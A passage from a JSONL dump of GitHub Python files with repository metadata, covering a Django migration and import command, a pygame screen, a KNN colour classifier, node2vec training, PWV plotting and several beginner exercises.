count2)\n\n\n\n","repo_name":"DiogoAlves002/Advent-of-Code-Solutions","sub_path":"day04/day04.py","file_name":"day04.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"74975963290","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('workCrew', '0010_student_active'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='job',\n name='day',\n field=models.CharField(max_length=200, null=True, blank=True),\n 
preserve_default=True,\n ),\n migrations.AddField(\n model_name='job',\n name='time',\n field=models.CharField(max_length=200, null=True, blank=True),\n preserve_default=True,\n ),\n ]\n","repo_name":"AFortune/labri-scheduler","sub_path":"workCrew/migrations/0011_auto_20150505_1506.py","file_name":"0011_auto_20150505_1506.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42660503647","text":"import os\nimport tempfile\n\nimport requests\nfrom django.core import files\nfrom django.core.management.base import BaseCommand\nfrom django.db import IntegrityError, transaction\nfrom django.db.models import Q\nfrom lxml import etree\n\nfrom tabletop.models import Entity, Game, GameEntity, GameImage\nfrom tabletop.utils.bgg import GAME_DETAILS_PATH, parse_game_details\n\n\ndef save_game(details):\n game = (\n Game.objects.filter(\n Q(bgg_id=details[\"bgg_id\"]) | Q(name__iexact=details[\"name\"])\n )\n .select_related(\"image\")\n .first()\n )\n if not game:\n created = True\n with transaction.atomic():\n game = Game.objects.create(\n name=details[\"name\"],\n bgg_id=details[\"bgg_id\"],\n min_players=details[\"min_players\"],\n max_players=details[\"max_players\"],\n duration=details[\"duration\"],\n duration_type=details[\"duration_type\"],\n year_published=details[\"year_published\"],\n parent=details[\"parent\"],\n )\n for entity in details[\"entities\"]:\n GameEntity.objects.create(\n entity=Entity.objects.get_or_create(name=entity[\"name\"])[0],\n game=game,\n type=entity[\"type\"],\n )\n else:\n created = False\n if not game.bgg_id:\n game.bgg_id = details[\"bgg_id\"]\n game.save(update_fields=[\"bgg_id\"])\n if details[\"parent\"] and not game.parent:\n game.parent = details[\"parent\"]\n game.save(update_fields=[\"parent\"])\n\n if details[\"image_url\"]:\n try:\n game.image\n except Game.image.RelatedObjectDoesNotExist:\n req = requests.get(details[\"image_url\"])\n tmp = tempfile.NamedTemporaryFile()\n for chunk in req.iter_content(1024 * 8):\n if not chunk:\n break\n tmp.write(chunk)\n image = GameImage(game=game)\n try:\n image.file.save(\n \"{}.{}\".format(\n str(game.id), details[\"image_url\"].rsplit(\".\", 1)[-1]\n ),\n files.File(tmp),\n )\n except IntegrityError:\n # invalid image type\n pass\n\n return game, created\n\n\nclass Command(BaseCommand):\n help = \"Import any games in the BoardGameGeek cache\"\n\n def handle(self, *args, **options):\n if not os.path.exists(GAME_DETAILS_PATH):\n self.stdout.write(\n self.style.MIGRATE_HEADING(\n \"No cached data in {}\".format(GAME_DETAILS_PATH)\n )\n )\n return\n\n self.stdout.write(\n self.style.MIGRATE_HEADING(\n \"Beginning import from {}\".format(GAME_DETAILS_PATH)\n )\n )\n\n for root, _, file_list in os.walk(GAME_DETAILS_PATH):\n for fn in file_list:\n if not fn.endswith(\".xml\"):\n self.stdout.write(self.style.ERROR(\"Unknown file: {}\".format(fn)))\n continue\n\n self.stdout.write(\n self.style.SQL_FIELD(\"Processing file: {}\".format(fn))\n )\n\n with open(os.path.join(root, fn), \"rb\") as fp:\n tree = etree.fromstring(fp.read())\n\n details = parse_game_details(tree)\n\n game, created = save_game(details)\n if created:\n self.stdout.write(\n self.style.SQL_FIELD(\"Created \".format(game.id))\n 
)\n","repo_name":"dcramer/tabletop-server","sub_path":"tabletop/management/commands/import_bgg.py","file_name":"import_bgg.py","file_ext":"py","file_size_in_byte":3724,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"32"} +{"seq_id":"21724300713","text":"\nimport setuptools\n\n\n# ========================================================================= #\n# HELPER #\n# ========================================================================= #\n\n\nwith open(\"README.md\", \"r\", encoding=\"utf-8\") as file:\n long_description = file.read()\n\nwith open('requirements.txt', 'r') as f:\n install_requires = (req[0] for req in map(lambda x: x.split('#'), f.readlines()))\n install_requires = [req for req in map(str.strip, install_requires) if req]\n\n\n# ========================================================================= #\n# SETUP #\n# ========================================================================= #\n\n\nsetuptools.setup(\n name=\"datasmith\",\n author=\"Nathan Juraj Michlo\",\n author_email=\"NathanJMichlo@gmail.com\",\n\n version=\"0.0.1.dev1\",\n python_requires=\">=3.8\",\n packages=setuptools.find_packages(),\n\n install_requires=install_requires,\n\n url=\"https://github.com/nmichlo/datasmith\",\n description=\"Create and convert machine learning datasets!\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n\n classifiers=[\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3.9\",\n \"Programming Language :: Python :: 3.10\",\n ],\n)\n\n\n# ========================================================================= #\n# END #\n# ========================================================================= #\n","repo_name":"nmichlo/datasmith","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2612902505","text":"def commission_atom(host_num,display_num,peripheral_num):\r\n host_price, display_price, peripheral_price = 25, 30, 45\r\n \r\n if host_num <= 0 or display_num <= 0 or peripheral_num <= 0 or host_num > 70 or display_num > 80 or peripheral_num > 90:\r\n return 'error', 'error'\r\n sales = host_num * host_price + display_num * display_price + peripheral_num * peripheral_price\r\n if sales <= 1000:\r\n return sales, float('%.2f' % (sales * 0.1))\r\n elif sales <= 1800:\r\n return sales, float('%.2f' % (sales * 0.15))\r\n else:\r\n return sales, float('%.2f' % (sales * 0.2))","repo_name":"huajiaohuixiang/SoftWareTest","sub_path":"back/project/ComputerSales.py","file_name":"ComputerSales.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"74152582490","text":"from General_Functions import *\n\nclass Death_Screen():\n def __init__(self):\n #State\n self.just_died = True\n #Images\n self.background_image = None\n self.death_screen_animation = [[pygame.image.load(\"Images/UI/death_screen_1.png\").convert_alpha(),5],[pygame.image.load(\"Images/UI/death_screen_2.png\").convert_alpha(),5],[pygame.image.load(\"Images/UI/death_screen_3.png\").convert_alpha(),5]]\n self.death_screen_current_frame = [0,0]\n self.death_messages = [pygame.image.load(\"Images/UI/death_message_1.png\").convert_alpha(),\n 
pygame.image.load(\"Images/UI/death_message_2.png\").convert_alpha(),\n pygame.image.load(\"Images/UI/death_message_3.png\").convert_alpha(),\n pygame.image.load(\"Images/UI/death_message_4.png\").convert_alpha(),\n pygame.image.load(\"Images/UI/death_message_5.png\").convert_alpha(),\n pygame.image.load(\"Images/UI/death_message_6.png\").convert_alpha(),\n pygame.image.load(\"Images/UI/death_message_7.png\").convert_alpha(),\n pygame.image.load(\"Images/UI/death_message_8.png\").convert_alpha(),\n pygame.image.load(\"Images/UI/death_message_9.png\").convert_alpha(),\n pygame.image.load(\"Images/UI/death_message_10.png\").convert_alpha(),\n ]\n self.current_death_message_index = None\n #Inputs\n self.mouse_pos = None\n self.left_click_down = None\n self.controller = False\n self.shooting_key = None\n self.controller_trigger_held = False\n #Pointer\n self.pointer_animation = [[pygame.image.load(\"Images/Player/pointer_1.png\").convert_alpha(),5],\n [pygame.image.load(\"Images/Player/pointer_2.png\").convert_alpha(),5],\n [pygame.image.load(\"Images/Player/pointer_3.png\").convert_alpha(),5],\n ] \n self.pointer_rect = self.pointer_animation[0][0].get_rect() #Just for centering it\n self.pointer_current_frame = [0,0]\n def update(self,game_state_manager,input_dict):\n #Unlock mouse from screen\n pygame.event.set_grab(False)\n #Update buttons\n self.mouse_pos = input_dict[\"mouse_pos\"]\n self.left_click_down = input_dict[\"left_click_down\"]\n self.controller = input_dict[\"controller\"]\n if self.controller:\n #Have to do this shenagians because no keydown for controller triggers\n self.shooting_key = False\n if not input_dict[\"shooting_key\"] and self.controller_trigger_held:\n print(\"TRUE\")\n self.controller_trigger_held = False\n if input_dict[\"shooting_key\"] and not self.controller_trigger_held:\n self.shooting_key = True\n if self.left_click_down or (self.controller and self.shooting_key):\n game_state_manager.state = game_state_manager.states[\"Reset Level\"]\n pygame.event.set_grab(True)\n self.just_died = True\n def draw(self,screen):\n if self.just_died:\n self.background_image = screen.convert()\n self.background_image.fill((50,50,50,10), special_flags=pygame.BLEND_ADD)\n self.current_death_message_index = random.randint(0,len(self.death_messages)-1)\n self.just_died = False\n self.death_screen_current_frame = animation(self.death_screen_animation,self.death_screen_current_frame)\n screen.blit(self.background_image,(0,0))\n screen.blit(self.death_screen_animation[self.death_screen_current_frame[0]][0],(0,0))\n screen.blit(self.death_messages[self.current_death_message_index],(260,440))\n #Mouse\n if self.mouse_pos:\n self.pointer_rect.centerx = self.mouse_pos[0]\n self.pointer_rect.centery = self.mouse_pos[1]\n self.pointer_current_frame = animation(self.pointer_animation,self.pointer_current_frame)\n screen.blit(self.pointer_animation[self.pointer_current_frame[0]][0],(self.pointer_rect.x,self.pointer_rect.y))\n \n\n","repo_name":"kadable/PROJECT-TRUNK-Public","sub_path":"Other_Files/Death_Screen.py","file_name":"Death_Screen.py","file_ext":"py","file_size_in_byte":4264,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"958512339","text":"\"\"\"\n给定一个整数数组 nums 和一个目标值 target,请你在该数组中找出和为目标值的那 两个 整数,并返回他们的数组下标。\n\"\"\"\n\nclass Solution:\n # 两次循环\n def twoSum(self, nums, target):\n size = len(nums)\n for i,num in enumerate(nums):\n j = i+1\n while jlist:\n try:\n 
img=cv.resize(img,(30,30),interpolation=cv.INTER_CUBIC)\n img=img[7:23,7:23]\n img=cv.resize(img,(30,30),interpolation=cv.INTER_CUBIC)\n except Exception as Error:\n print(Error)\n return None\n #img= cv.GaussianBlur(img,(3,3),0)\n #img= cv.GaussianBlur(img,(15,15),0)\n # lower_green = np.array([35, 43, 46])\n # upper_green = np.array([78, 255, 255])\n \n # maskgreen = cv2.inRange(img, lower_green, upper_green)\n # masknotgreen = cv2.bitwise_not(maskgreen)\n # img= cv2.bitwise_and(img, img, mask=masknotgreen)\n # N=img.shape[0]*img.shape[1]\n\n #img=cv.cvtColor(img,cv.COLOR_RGB2HSV)\n img1=cv.cvtColor(img,cv.COLOR_RGB2HSV)\n #img2=cv.cvtColor(img,cv.COLOR_RGBA2GRAY)\n\n #hist=ColorCluster(img)\n #cv.imshow(\"F\",img)\n #cv.waitKey(0)&0xFF\n #m=np.sum(img)/(img.shape[0]*img.shape[1])\n H,S,V=cv.split(img)\n mask1=H-S\n mask2=S-V\n mask2[mask2!=0]=1\n # mask1[mask1!=0]=1\n # mask2[mask2!=0]=1\n mask2[mask1!=0]=1\n img[mask2==0]=0\n hist1 = cv.calcHist([img], [0], None, [10], [0.0,255.0])\n hist2 = cv.calcHist([img], [1], None, [10], [0.0,255.0])\n hist3 = cv.calcHist([img], [2], None, [10], [0.0,255.0])\n hist4 = cv.calcHist([img1],[0], None, [25], [0.0,255.0])\n hist5 = cv.calcHist([img1],[1], None, [25], [0.0,255.0])\n hist6 = cv.calcHist([img1],[2], None, [25], [0.0,255.0])\n #histg = cv.calcHist([img2],[0], None, [100], [0.0,255.0])\n hist=np.concatenate((hist1,hist2,hist3,hist4,hist5,hist6),axis=0)\n #print(hist.tolist())\n #muH=hist[0]\n #muS=hist[1]\n #muV=hist[2]\n #img[mask2==0]=0\n # H,S,V=cv.split(img)\n # N=img.shape[0]*img.shape[1]\n # muH=np.sum(H)\n # # H[H!=0]=1\n # # N=np.sum(H)+1\n # muH=muH/N\n # muS=np.sum(S)/N\n # muV=np.sum(V)/N\n \n return hist#[muH,muS,muV]#[m,m,m]#\n # H,S,V,N=0,0,0,1\n\n # for i in range(img.shape[0]):\n # for j in range(img.shape[1]):\n # if img[i][j][0]==img[i][j][1] and img[i][j][1]==img[i][j][2]:\n # continue\n # else:\n # H=H+img[i][j][0]\n # S=S+img[i][j][1]\n # V=V+img[i][j][2]\n # N=N+1\n # return [H/N,S/N,V/N]\n\n# def main_color_moment(img):\n# \"\"\"\n# 提取图片的颜色HSV特征\n# \"\"\"\n# try:\n# img=cv.resize(img,(20,20),interpolation=cv.INTER_CUBIC)\n# except Exception as Error:\n# print(Error)\n# return None\n# #img= cv2.GaussianBlur(img,(3,3),0)\n# #img= cv2.GaussianBlur(img,(15,15),0)\n# # lower_green = np.array([35, 43, 46])\n# # upper_green = np.array([78, 255, 255])\n \n# # maskgreen = cv2.inRange(img, lower_green, upper_green)\n# # masknotgreen = cv2.bitwise_not(maskgreen)\n# # img= cv2.bitwise_and(img, img, mask=masknotgreen)\n# # N=img.shape[0]*img.shape[1]\n\n# img=cv.cvtColor(img,cv.COLOR_RGB2HSV)\n# #img=cv2.cvtColor(img,cv2.COLOR_RGBA2GRAY)\n\n# img=ColorCluster(img)\n# #m=np.sum(img)/(img.shape[0]*img.shape[1])\n# H,S,V=cv.split(img)\n# mask1=H-S\n# mask2=S-V\n# # mask1[mask1!=0]=1\n# # mask2[mask2!=0]=1\n# mask2[mask1!=0]=1\n# img[mask2==0]=0\n# H,S,V=cv.split(img)\n# muH=np.sum(H)\n# H[H!=0]=1\n# N=np.sum(H)+1\n# muH=muH/N\n# muS=np.sum(S)/N\n# muV=np.sum(V)/N\n# return [muH,muS,muV]#[m,m,m]#\n# # H,S,V,N=0,0,0,1\n\n# # for i in range(img.shape[0]):\n# # for j in range(img.shape[1]):\n# # if img[i][j][0]==img[i][j][1] and img[i][j][1]==img[i][j][2]:\n# # continue\n# # else:\n# # H=H+img[i][j][0]\n# # S=S+img[i][j][1]\n# # V=V+img[i][j][2]\n# # N=N+1\n# # return [H/N,S/N,V/N]\n\n\ndef init_KNN(path=online_data_save_path):\n KNN=KNNClassifier(modelpath=online_data_save_path)\n return KNN\n\n\n# def judge_by_knn(img,KNN):\n# #m=main_color_moment(img)\n# KNN.prediction(img,KNN)\n \n\n\ndef init_center(path=None):\n centerpoint={}\n 
for i in os.listdir(path):\n if i!=\".DS_Store\":\n N,H,S,V=0,0,0,0\n for j in os.listdir(os.path.join(path,i)):\n if j!=\".DS_Store\":\n N+=1\n img=cv.imread(os.path.join(path,i,j))\n m=main_color_moment(img)\n #print(m)\n H=H+m[0]\n S=S+m[1]\n V=V+m[2]\n #print(m)\n centerpoint[i]=[H/N,S/N,V/N]\n return centerpoint\n\ndef color_classify(frame,box,centerpoint):\n img=frame[box[1]:box[1]+box[3],box[0]:box[0]+box[2]]\n return judge(centerpoint,img)\n\n\ndef judge(centerpoint,img):\n #cv2.imshow(\"uuu\",ColorCluster(img))\n #cv2.waitKey(0)&0xFF\n m=main_color_moment(img)\n #destence={}\n mind=255*255\n keymin=0\n for key,i in centerpoint.items():\n destence=(i[0]-m[0])**2+(i[1]-m[1])**2+(i[2]-m[2])**2\n if mind>destence:\n mind=destence\n keymin=key\n return keymin\n\ndef test(test_path,centerpoint):\n fps=[]\n acc={}\n for i in os.listdir(test_path):\n if i!=\".DS_Store\":\n count=0\n wrong=0\n for j in os.listdir(os.path.join(test_path,i)):\n if j!=\".DS_Store\":\n img=cv.imread(os.path.join(test_path,i,j))\n stime=time.time()\n fact=judge(centerpoint,img)\n endtime=time.time()\n fps.append(1/(endtime-stime))\n if fact!=i:\n wrong+=1\n count+=1\n acc[i]=(count-wrong)/count\n print(\"fps={0:4>.2f}\".format(sum(fps)/len(fps)))\n return acc\n\ndef get_best_center(centerpoint,data_path):\n #best_center=[]\n err=500\n loss_now=0\n loss_last=0\n count=1\n try_centerpoint=centerpoint\n while loss_now<3:\n loss_now=0\n for key,value in try_centerpoint.items():\n value[0]+=random.choice([-1,1])*random.random()*1/count\n value[1]+=random.choice([-1,1])*random.random()*1/count\n value[2]+=random.choice([-1,1])*random.random()*1/count\n try_centerpoint[key]=value\n for i in os.listdir(data_path):\n if i!=\".DS_Store\":\n right=0\n num=0\n for j in os.listdir(os.path.join(data_path,i)):\n if j!=\".DS_Store\":\n img=cv.imread(os.path.join(data_path,i,j))\n fact=judge(try_centerpoint,img)\n if fact==i:\n right+=1\n num+=1\n loss_now+=right/num\n #loss_now+=(try_centerpoint[i][0]-m[0])**2+(try_centerpoint[i][1]-m[1])**2+(try_centerpoint[i][2]-m[2])**2\n err=loss_last-loss_now\n print(loss_last,loss_now)\n if err>0:\n try_centerpoint=centerpoint\n err=abs(err)+1\n else:\n loss_last=loss_now\n centerpoint=try_centerpoint\n err=abs(err)\n count+=1\n if count>1000:\n break\n if count%10==0:\n print(centerpoint)\n return centerpoint\n\nif __name__ == '__main__':\n img=cv.imread('/home/wxyice/Desktop/srtp/srtp_code/color_data/other/C/13.jpg')\n print(img.shape)\n\n KKK=KNNClassifier()\n print(KKK.prediction(img))\n","repo_name":"chenzhike110/yolov4_siamfcpp_multitracking","sub_path":"knnmodel.py","file_name":"knnmodel.py","file_ext":"py","file_size_in_byte":12176,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"} +{"seq_id":"74860029212","text":"import os\nimport sys\n\nimport torch\nimport networkx as nx\nimport matplotlib.pyplot as plt\n\nfrom sklearn.manifold import TSNE\nfrom torch_geometric.nn import Node2Vec\nfrom torch_geometric.utils.convert import (\n from_scipy_sparse_matrix\n)\n\ndef train(model, optimizer, loader, device='mps'):\n model.train()\n total_loss = 0\n for pos_rw, neg_rw in loader:\n optimizer.zero_grad()\n loss = model.loss(pos_rw.to(device), neg_rw.to(device))\n loss.backward()\n optimizer.step()\n total_loss += loss.item()\n return total_loss / len(loader)\n\ndef main():\n # device = 'cuda' if torch.cuda.is_available() else 'cpu'\n device = \"cpu\"\n for folder in sorted(os.listdir('data'), key=lambda x: int(x)):\n print(f\"Processing 
pathway #{folder}...\")\n fpath = os.path.join('data', folder, f'{folder}.edges')\n G = nx.read_edgelist(fpath)\n adj = nx.adjacency_matrix(G)\n # adj = dense_to_sparse(adj)\n edge_index, attr = from_scipy_sparse_matrix(adj)\n model = Node2Vec(\n edge_index,\n embedding_dim=100,\n walk_length=20,\n context_size=10,\n walks_per_node=10,\n num_negative_samples=1,\n p=1,\n q=1,\n sparse=True,\n ).to(device)\n\n # num_workers = 0 if sys.platform.startswith('win') else 4\n num_workers = 4\n loader = model.loader(batch_size=128, shuffle=True, num_workers=4)\n optimizer = torch.optim.SparseAdam(list(model.parameters()), lr=0.01)\n\n for epoch in range(1, 101):\n loss = train(model, optimizer, loader, device=device)\n print(f'Epoch: {epoch:03d}, Loss: {loss:.4f}')\n\n torch.save(model.embedding, f'pathbank/node2vec/{folder}.pt')\n\n\n # @torch.no_grad()\n # def test():\n # model.eval()\n # z = model()\n # acc = model.test(z[data.train_mask], data.y[data.train_mask],\n # z[data.test_mask], data.y[data.test_mask],\n # max_iter=150)\n # return acc\n\n\n # @torch.no_grad()\n # def plot_points(colors):\n # model.eval()\n # z = model(torch.arange(data.num_nodes, device=device))\n # z = TSNE(n_components=2).fit_transform(z.cpu().numpy())\n # y = data.y.cpu().numpy()\n\n # plt.figure(figsize=(8, 8))\n # for i in range(dataset.num_classes):\n # plt.scatter(z[y == i, 0], z[y == i, 1], s=20, color=colors[i])\n # plt.axis('off')\n # plt.show()\n\n # colors = [\n # '#ffc0cb', '#bada55', '#008080', '#420420', '#7fe5f0', '#065535',\n # '#ffd700'\n # ]\n # plot_points(colors)\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"mcneela/Mixed-Curvature-Pathways","sub_path":"pathbank/run_node2vec.py","file_name":"run_node2vec.py","file_ext":"py","file_size_in_byte":2714,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"40004220023","text":"modules_to_test = ['test_pypipegraph', 'test_plotjobs']\n\nimport os\nos.environ['PYPIPEGRAPH_DO_COVERAGE'] = '/code/pypipegraph/pypipegraph/tests/.coveragerc'\nimport coverage\nwith open(\".coveragerc\",'wb') as op:\n op.write(b\"\"\"\n[run]\ndata_file = /code/pypipegraph/pypipegraph/tests/.coverageX\nparallel=True\n[report]\ninclude = *pypipegraph*\n \"\"\") \n\n\ncov = coverage.coverage(source = [os.path.abspath('../')], config_file = '.coveragerc', data_suffix=True)\ncov.start()\n\nimport unittest\nimport nose\nimport noseprogressive\nimport sys\nsys.path.append('/code/pypipegraph/')\nimport pypipegraph as ppg\n\ntry:\n nose.core.runmodule(modules_to_test, argv=sys.argv + ['--with-progressive', \n '--nologcapture'\n ], exit=False) #log capture get's a ton of output from the pipegraph... 
enable if you need it\nexcept Exception as e:\n print ('error')\n print (e)\n pass\ncov.stop()\ncov.save()\nos.system('coverage combine')\nos.system('coverage html -d covhtml')\nprint ('coverage report is in covhtml/index.html')\n","repo_name":"gitter-badger/pypipegraph","sub_path":"pypipegraph/tests/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"33323349468","text":"from MyDB import MyDB\nimport pymysql\n\nclass MySQLDB(MyDB):\n\n def __init__(self, h, p, d, u, pwd):\n MyDB.__init__(self, h, p, d, u, pwd)\n\n def getConnectionString(self):\n return {\n 'user': self.user,\n 'passwd': self.pswd,\n 'host': self.host,\n 'db': self.db,\n }\n\n def connect(self):\n config = self.getConnectionString()\n try:\n self.cnx = pymysql.connect(**config)\n except pymysql.Error as err:\n print(err)\n else:\n return True\n\n return False\n","repo_name":"uridanan/MyDataReader","sub_path":"MySQLDB.py","file_name":"MySQLDB.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73808612892","text":"'''\nThis example show a typical design of a class. For full details look at the accompanying Jupyter Notebook\n'''\nprint()\n#test\n\nclass Point: # this is the same as Point(object)\n '''\n put documentation in here\n '''\n def __init__(self, name, x0 = 0, y0 = 0):\n '''\n put documentation in here\n '''\n self.name = name\n self.x = x0\n self.y = y0\n \n def moveBy(self, dx, dy):\n self.x += dx\n self.y += dy\n \n def display(self):\n print(\"Point {} is at ({},{})\".format(self.name, self.x, self.y))\n \n# create objects\nq = Point('origin')\np1 = Point('point-1', 100, 200)\np2 = Point('point-2', 200, 300)\np3 = Point('point-3', 300, 500)\nprint(Point.__dict__)\nprint(Point.__bases__)\nprint(p1.__dict__)\nprint(p1.__class__)\np1.moveBy(1, 1)\np2.moveBy(2, 3)\np3.moveBy(3, 6)\n\np1.display()\np2.display()\np3.display()\n\n\n","repo_name":"zaeemnajeeb/Python_training_diamond","sub_path":"src/07 Classes and Objects/01.simple_class.py","file_name":"01.simple_class.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"22473791389","text":"import matplotlib.pyplot as plt\nimport re\nfrom itertools import islice\nimport numpy as np\nimport os\nfrom Hurricane import Hurricane\n\n\ndef pw_and_error_plot(site_globel, site_a, pwv_info_path, pwv_err_info_path):\n '''\n 绘制pw的时间序列图和pw error的时间序列图\n :param site_a: 需要绘图的site\n :param pwv_info_path:\n :param pwv_err_info_path:\n :return: None\n '''\n plt.figure(figsize=(500,500))\n pw, pwerr = [],[]\n with open(pwv_info_path, 'r') as f:\n for line in islice(f, 0, None):\n pw.append(re.split(',', line)[1:-1])\n with open(pwv_err_info_path, 'r') as f:\n for line in islice(f, 0, None):\n pwerr.append(re.split(',', line)[1:-1])\n pw = np.array(pw, dtype=float)\n pwerr = np.array(pwerr, dtype=float)\n index_a = [int(i[4]) for i in site_a]\n pw_a = pw[index_a][:]\n pwerr_a = pwerr[index_a][:]\n x = [i for i in range(np.shape(pw_a)[1])]\n legend = []\n for i in range(np.shape(pw_a)[0]):\n plt.scatter(x, pw_a[i][:], marker='.')\n legend.append(site_globel[index_a[i]][3])\n plt.title(\"2020 205-208 Hurricane HANNA PWV time series\")\n plt.xlabel(\"time(interval:30min)\")\n plt.ylabel(\"PW(mm)\")\n plt.legend(legend, fontsize=5, loc='best')\n plt.show()\n\n return 
0\n\ndef series_site_pwv_plot(h:Hurricane, sitenames:list):\n pw, pwerr = [], []\n with open(h.pwv_path + \"sitepwvtimeordered.txt\", 'r') as f:\n for line in islice(f, 0, None):\n pw.append(re.split(',', line)[1:-1])\n with open(h.pwv_path + \"sitepwverrtimeordered.txt\", 'r') as f:\n for line in islice(f, 0, None):\n pwerr.append(re.split(',', line)[1:-1])\n pw = np.array(pw, dtype=float)\n # pwerr = np.array(pwerr, dtype=float)\n index_a = [int(i[4]) for i in h.site_a]\n pw_a = pw[index_a][:]\n # pwerr_a = pwerr[index_a][:]\n x0 = np.array([i for i in range(np.shape(pw_a)[1])])\n x = x0.reshape((1,len(x0)))\n\n # 画site的pwv时间序列图\n plt.figure(figsize=(6, 12))\n i = 1\n colors = ['r', 'g' ,'b', 'y', 'm', 'r']\n for each in sitenames:# TODO - 2021 04 11 待修改\n plt.subplot(len(sitenames),1,i)\n index = np.where(h.site_a==each)[0]\n if len(index)==0:\n print(each + ' 找不到!\\n')\n plt.scatter(x, pw_a[index][:], marker='.', s=10,color = 'b', label = each)\n if i != len(sitenames):\n plt.xticks([])\n else:\n doy = [str(dd) for dd in range(h.duration[0]-1, h.duration[1])]\n ll = [i * 2 * 24 for i in range(len(doy))]\n plt.xticks(ll, doy)\n plt.xlim((0*48, 6*48))\n plt.ylim((10, 65))\n plt.legend(loc = 'upper right')\n i = i+1\n\n # plt.title(str(h.year) + \" \" + str(h.duration[0]) + \"-\" + str(\n # h.duration[1]) + \" Hurricane \" + h.name + \" PWV time series ()\")\n # plt.xlabel(\"time(interval:30min)\")\n # plt.ylabel(\"PW(mm)\")\n # plt.legend(legend, fontsize=5, loc='best')\n plt.savefig(h.pc_dir + 'plot\\\\' + \"PW of series (selected) sites.png\", dpi=500)\n\n\ndef single_site_pwv_plot(h:Hurricane):\n '''\n 单独画每个测站的图\n :param h: 飓风类\n :return:\n '''\n path = h.pc_dir+'single_site_pwv_plot\\\\'\n if not os.path.exists(path):\n os.makedirs(path)\n\n pw, pwerr = [], []\n with open(h.pwv_path + \"sitepwvtimeordered.txt\", 'r') as f:\n for line in islice(f, 0, None):\n pw.append(re.split(',', line)[1:-1])\n with open(h.pwv_path + \"sitepwverrtimeordered.txt\", 'r') as f:\n for line in islice(f, 0, None):\n pwerr.append(re.split(',', line)[1:-1])\n pw = np.array(pw, dtype=float)\n # pwerr = np.array(pwerr, dtype=float)\n index_a = [int(i[4]) for i in h.site_a]\n pw_a = pw[index_a][:]\n # pwerr_a = pwerr[index_a][:]\n x0 = np.array([i for i in range(np.shape(pw_a)[1])])\n x = x0.reshape((1, len(x0)))\n\n doy = [str(dd) for dd in range(h.duration[0] - 1, h.duration[1])]\n ll = [i * 2 * 24 for i in range(len(doy))]\n sites = h.site_qc1[0]\n for i in range(np.shape(sites)[0]):\n each = sites[i][3]\n plt.figure()\n index = np.where(h.site_a == each)[0]\n plt.scatter(x, pw_a[index][:], marker='.', s=20, color='b')\n plt.xticks(ll, doy)\n plt.xlim((0 * 48, len(doy) * 48))\n plt.ylim((10, 70))\n plt.title(each+\" PWV \")\n plt.savefig(path+each+\"_pwv.png\", dpi=500)\n","repo_name":"Withoutwaxwqy/atomsphere_data_process","sub_path":"pw_plot.py","file_name":"pw_plot.py","file_ext":"py","file_size_in_byte":4447,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"5716718749","text":"# -*- coding: utf-8 -*-\n# @Time : 2021/7/31 18:44 下午\n# @Author : HanChen\n# @File : 6_7.py\n# @Software: Sublime Text\n\n# ------------------ example01 ------------------\n\"\"\"\n6-7 人:在为完成练习 6-1 而编写的程序中,再创建两个表示人的字典,然后将这三个字典都存储在一个名为 people 的列表中。遍历这个列表,将其中每个人的所有信息都打印出来。\n\"\"\"\npeople = []\n\nperson = {\n 'first_name': 'San', \n 'last_name': 'Zhang', \n 'age': 18, \n 'city': 'BeiJing',\n }\n\npeople.append(person)\n\nperson = {\n 'first_name': 'Si', \n 'last_name': 
'Li', \n 'age': 20, \n 'city': 'BeiJing',\n }\n\npeople.append(person)\n\nperson = {\n 'first_name': 'Wu', \n 'last_name': 'Wang', \n 'age': 17, \n 'city': 'BeiJing',\n }\n \npeople.append(person)\n\nfor person in people:\n name = person['first_name'].title() + \" \" + person['last_name'].title()\n age = str(person['age'])\n city = person['city'].title()\n\n print(name + \", of \" + city + \", is \" + age + \" years old.\")\n# ------------------ example01 ------------------\n","repo_name":"HanChen1988/PythonStudy","sub_path":"Book/BookNo001/Chapter_06/python_work/6_7.py","file_name":"6_7.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4872158189","text":"from Classes.vk.Post import Post\nimport time\nfrom datetime import datetime, timedelta, date\nimport pytz\nimport constants\nfrom Classes.vk.Comment import Comment\n\n\ndef createPostDates(hours):\n result = []\n for hour in hours:\n dt = (datetime.combine(date.today(), datetime.min.time()) + timedelta(days=1, hours=hour)).replace(\n tzinfo=pytz.timezone('Europe/Moscow'))\n result.append(\n int(time.mktime(dt.timetuple()))\n )\n return result\n\ndef main():\n # dt = datetime.now()\n # dt_st = dt - timedelta(days=dt.weekday())\n # start_time = int(time.mktime(dt_st.timetuple()))\n # dt_end = 